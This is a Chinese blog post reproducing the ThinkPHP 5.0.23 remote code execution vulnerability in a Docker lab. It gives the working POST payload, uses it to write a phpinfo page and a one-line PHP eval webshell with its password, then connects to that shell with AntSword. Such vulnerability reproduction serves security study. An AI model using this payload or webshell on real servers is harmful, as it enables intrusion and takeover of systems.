Thinkphp5.0.23 rce(远程代码执行)的漏洞复现

这篇具有很好参考价值的文章主要介绍了Thinkphp5.0.23 rce(远程代码执行)的漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Thinkphp5.0.23 rce(远程代码执行)的漏洞复现

漏洞形成原因

  • 框架介绍:
    ThinkPHP是一款运用极广的PHP开发框架。
  • 漏洞引入:
    其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

漏洞如何利用

  • 1、访问靶机地址+端口号 进入首页
  • 2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd为系统执行命令可进行一系列操作。

漏洞复现过程

  • Kali docker 容器中启动此漏洞环境
    Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
  • 浏览器访问 Kali 的 ip 地址接上8080端口

Thinkphp5.0.23 rce(远程代码执行)的漏洞复现

  • Burp抓包修改传参方式为Post,url后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。
    Thinkphp5.0.23 rce(远程代码执行)的漏洞复现Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
/index.php?s=captcha		#url后接
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd	#POST传入参数
  • Burp Go Thinkphp5.0.23 rce(远程代码执行)的漏洞复现Thinkphp5.0.23 rce(远程代码执行)的漏洞复现

  • 尝试写入phpinfo

echo "<?php phpinfo(); ?>" > info.php

Thinkphp5.0.23 rce(远程代码执行)的漏洞复现

  • 成功!
    Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
  • 写入一句话
echo '<?php eval($_POST[aaa]); ?>' > shell.php	#密码:aaa

Thinkphp5.0.23 rce(远程代码执行)的漏洞复现文章来源地址https://www.toymoban.com/news/detail-464494.html

  • 上蚁剑!
    Thinkphp5.0.23 rce(远程代码执行)的漏洞复现Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
  • 漏洞复现成功
    参考文章:https://www.cnblogs.com/zenb/p/14537240.html
    技术萌新,还请各位大牛多多指点!

到了这里,关于Thinkphp5.0.23 rce(远程代码执行)的漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • ThinkPHP5远程命令执行漏洞

    ThinkPHP是一个快速、兼容而且简单的轻量级国产 PHP开发框架 ,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,使用面向对象的开发结构和 MVC模式 ,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式。 由于th

    2024年02月11日
    浏览(34)
  • ThinkPHP5.0.21远程命令执行漏洞

    漏洞出现的背景 : ThinkPHP是⼀款运⽤极⼴的PHP开发框架。 其5.0.23以前的版本中,获取method的⽅法中没有正确处理⽅法名, 导致攻击者可以调⽤Request类任意⽅法并构造利⽤链,从⽽导致远程代码执⾏漏洞。 由于ThinkPHP5框架对控制器名没有进⾏⾜够的安全检测,导致在没有开

    2024年02月04日
    浏览(35)
  • ThinkPHP5.0.0~5.0.23路由控制不严谨导致的RCE

    本次我们继续以漏洞挖掘者的视角,来分析thinkphp的RCE 敏感函数发现 在调用入口函数:/ThinkPHP_full_v5.0.22/public/index.php 时 发现了框架底层调用了thinkphplibrarythinkApp.php的app类中的incokeMethod方法  注意传递的参数,ReflectionMethod接受的参数。如果是数组的形式, 那么参数1是这个

    2024年01月23日
    浏览(28)
  • RCE 远程代码执行漏洞分析

    Remote Command/Code Execute 远程命令执行/远程代码执行漏洞 这种漏洞通常出现在应用程序或操作系统中,攻击者可以通过利用漏洞注入恶意代码,并在受攻击的系统上执行任意命令。 PHP 代码执行 PHP 代码注入 OS 命令执行 OS 命令注入 Java、Python…… Web 应用程序 远程服务 操作系统

    2024年02月08日
    浏览(28)
  • RCE(远程命令执行)漏洞详解

    RCE(remote command/code execute,远程命令执行)漏洞 远程代码执行 (RCE) 攻击是指攻击者可以在一个组织的计算机或网络上运行恶意代码。执行攻击者控制的代码的能力可用于各种目的,包括部署额外的恶意软件或窃取敏感数据。 远程代码执行攻击通常通过网络应用程序和网络基础

    2024年04月10日
    浏览(40)
  • RCE远程命令执行漏洞挖掘思路

    1.URL上 在 url参数上 ,不仅仅可能存在ssrf漏洞,也有很大概率存在命令执行,很大可能调用系统命令如curl。 payload例子: index.php?id=2;}phpinfo();/* ttp://www.xxx.com/cmd.php?cmd=phpinfo() 比如访问到如下URL,在jsp后面尝试加参数,比如path(什么参数需要试)     http://x.x.x.x:28076/file/dirF

    2024年02月01日
    浏览(42)
  • 4.9、漏洞利用 smb-RCE远程命令执行

    目录 1、samba服务介绍 2、漏洞相关信息 3、探测samba 4、metasploit利用 5、samba历年漏洞 1.1 samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。 1.2 SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域

    2024年02月07日
    浏览(57)
  • HVV爆火漏洞:最新 WPS RCE (远程命令执行) 复现

    最近HVV爆出的很火的WPS命令执行漏洞,其实并不是0DAY,早在2019年就出现了,只不过最近EXP才公开。接下来我们来复现一遍。 WPS Office 2023 个人版 11.1.0.15120 WPS Office 2019 企业版 11.8.2.12085 wps版本: WPS V11.1.0.12300 靶机: windows 10 攻击机: ubuntu 20.04     IP:192.168.2.103 WPS 内置了一

    2024年02月11日
    浏览(41)
  • RCE代码执行漏和命令执行漏洞

    前置知识: 漏洞检测: 在了解漏洞概念前,应该先知道一下这个漏洞如何检测的,我们应该或多或少听过白盒测试(白盒),黑盒测试(黑盒)。 白盒测试: 白盒测试是对源代码和内部结构的测试,测试人员是可以知道内部的逻辑和结构的,差不多就是代码审计。 黑盒测试:

    2024年02月19日
    浏览(25)
  • Thinkphp5.x全漏洞复现分析

    我们可以把namespace理解为一个单独的空间,事实上它也就是一个空间而已,子命名空间那就是空间里再划分几个小空间,举个例子: 当有多个子命名空间有相同名称类时,不指定使用哪个命名空间的情况下取最后定义的命名空间中的类,比如上面的 dog 取的时 dogC 中的类,在

    2024年04月22日
    浏览(33)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包